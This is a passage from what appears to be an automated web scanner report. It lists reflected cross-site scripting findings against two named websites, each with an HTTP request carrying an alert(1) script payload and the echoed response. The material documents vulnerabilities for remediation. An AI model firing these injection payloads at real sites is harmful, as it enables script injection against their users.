   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEMCAB60"-ALERT(1)-"CED730FFDFC&CAT=20&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTI
...[SNIP]...

1.134. http://www.haymarketbusinesssubs.com/subscriptions/ [itemID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the itemID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe00"-alert(1)-"a6076651e04 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItem&cat=20&itemID=SCWEB09GBP01bbe00"-alert(1)-"a6076651e04 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:21 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970767;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/
Set-Cookie: CFTOKEN=41263314;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/
Set-Cookie: JSESSIONID=56306b4e7a5963266475;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
t="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20&ITEMID=SCWEB09GBP01BBE00"-ALERT(1)-"A6076651E04?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETTINGS
   hbx.fv="";//F
...[SNIP]...

1.135. http://www.haymarketbusinesssubs.com/subscriptions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1f9"-alert(1)-"eeb60f51ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?ad1f9"-alert(1)-"eeb60f51ea4=1 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:47:59 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970719;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/
Set-Cookie: CFTOKEN=14115562;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/
Set-Cookie: JSESSIONID=5630cf1f6100301d4d75;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
SECTION
   //CONFIGURATION VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?AD1F9"-ALERT(1)-"EEB60F51EA4=1?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETTINGS
   hbx.fv="";/
...[SNIP]...

1.136. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78edb"><script>alert(1)</script>47e97b4e7e6 was submitted in the REST URL parameter 1. This input was echoed as 78edb\"><script>alert(1)</script>47e97b4e7e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78edb"><script>alert(1)</script>47e97b4e7e6 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/favicon.ico78edb\"><script>alert(1)</script>47e97b4e7e6" type="hidden" />
...[SNIP]...

1.137. http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformation/security_software [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /network-security-solutions-obstacles-in-it-transformation/security_software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab61"><script>alert(1)</script>ffe87d33d24 was submitted in the REST URL parameter 1. This input was echoed as fab61\"><script>alert(1)</script>ffe87d33d24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /network-security-solutions-obstacles-in-it-transformationfab61"><script>alert(1)</script>ffe87d33d24/security_software HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 19:48:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 19:48:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61\"><script>alert(1)</script>ffe87d33d24/security_software" type="hidden" />
...[SNIP]...

1.138. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb59"><script>alert(1)</script>9ce1fb0d6b9 was submitted in the REST URL parameter 1. This input was echoed as 4fb59\"><script>alert(1)</script>9ce1fb0d6b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin4fb59"><script>alert(1)</script>9ce1fb0d6b9/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin4fb59\"><script>alert(1)</script>9ce1fb0d6b9/css/colors-fresh.css" type="hidden" />
...[SNIP]...

1.139. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 108f1"><script>alert(1)</script>2542fce189a was submitted in the REST URL parameter 2. This input was echoed as 108f1\"><script>alert(1)</script>2542fce189a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css108f1"><script>alert(1)</script>2542fce189a/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css108f1\"><script>alert(1)</script>2542fce189a/colors-fresh.css" type="hidden" />
...[SNIP]...

1.140. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25734"><script>alert(1)</script>2b4c433f186 was submitted in the REST URL parameter 3. This input was echoed as 25734\"><script>alert(1)</script>2b4c433f186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/colors-fresh.css25734"><script>alert(1)</script>2b4c433f186 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css/colors-fresh.css25734\"><script>alert(1)</script>2b4c433f186" type="hidden" />
...[SNIP]...

1.141. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976b6"><script>alert(1)</script>ef7c2ff4d9b was submitted in the REST URL parameter 1. This input was echoed as 976b6\"><script>alert(1)</script>ef7c2ff4d9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin976b6"><script>alert(1)</script>ef7c2ff4d9b/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin976b6\"><script>alert(1)</script>ef7c2ff4d9b/css/login.css" type="hidden" />
...[SNIP]...

1.142. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a36"><script>alert(1)</script>3f9128e0065 was submitted in the REST URL parameter 2. This input was echoed as c2a36\"><script>alert(1)</script>3f9128e0065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/cssc2a36"><script>alert(1)</script>3f9128e0065/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/cssc2a36\"><script>alert(1)</script>3f9128e0065/login.css" type="hidden" />
...[SNIP]...

1.143. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16a7d"><script>alert(1)</script>e31de724c2f was submitted in the REST URL parameter 3. This input was echoed as 16a7d\"><script>alert(1)</script>e31de724c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/login.css16a7d"><script>alert(1)</script>e31de724c2f HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css/login.css16a7d\"><script>alert(1)</script>e31de724c2f" type="hidden" />
...[SNIP]...

1.144. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb603"><script>alert(1)</script>854924fe41d was submitted in the REST URL parameter 1. This input was echoed as fb603\"><script>alert(1)</script>854924fe41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentfb603"><script>alert(1)</script>854924fe41d/plugins/sexybookmarks/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentfb603\"><script>alert(1)</script>854924fe41d/plugins/sexybookmarks/css/comfeed.css" type="hidden" />
...[SNIP]...

1.145. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c934"><script>alert(1)</script>212a21e8ebb was submitted in the REST URL parameter 2. This input was echoed as 9c934\"><script>alert(1)</script>212a21e8ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9c934"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins9c934\"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css" type="hidden" />
...[SNIP]...

1.146. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79afa"><script>alert(1)</script>6f363fd4d80 was submitted in the REST URL parameter 3. This input was echoed as 79afa\"><script>alert(1)</script>6f363fd4d80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks79afa"><script>alert(1)</script>6f363fd4d80/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks79afa\"><script>alert(1)</script>6f363fd4d80/css/comfeed.css" type="hidden" />
...[SNIP]...

1.147. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887ac"><script>alert(1)</script>e3828ad6376 was submitted in the REST URL parameter 4. This input was echoed as 887ac\"><script>alert(1)</script>e3828ad6376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css887ac"><script>alert(1)</script>e3828ad6376/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
